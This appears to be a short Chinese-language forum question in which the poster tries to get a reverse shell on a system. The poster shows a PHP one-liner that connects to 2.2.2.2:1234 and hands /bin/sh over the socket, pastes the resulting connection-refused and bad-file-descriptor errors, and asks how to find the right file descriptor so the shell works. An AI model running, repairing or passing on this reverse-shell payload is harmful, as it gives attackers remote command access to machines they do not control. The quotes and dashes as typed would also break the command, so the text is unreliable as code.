尝试运行此脚本以获取系统的反向外壳。
php –r ‘$sock=fsockopen(“2.2.2.2”,1234);exec(“/bin/sh –I <&3 >&3 2>&3”);’
但是它说:
PHP Warning: fsockopen(): unable to connect to 2.2.2.2:1234 (Connection refused) in Command line code on line 1
sh: 1: 3: Bad file descriptor
如何找出使用哪个文件描述符的TCP连接?
谢谢。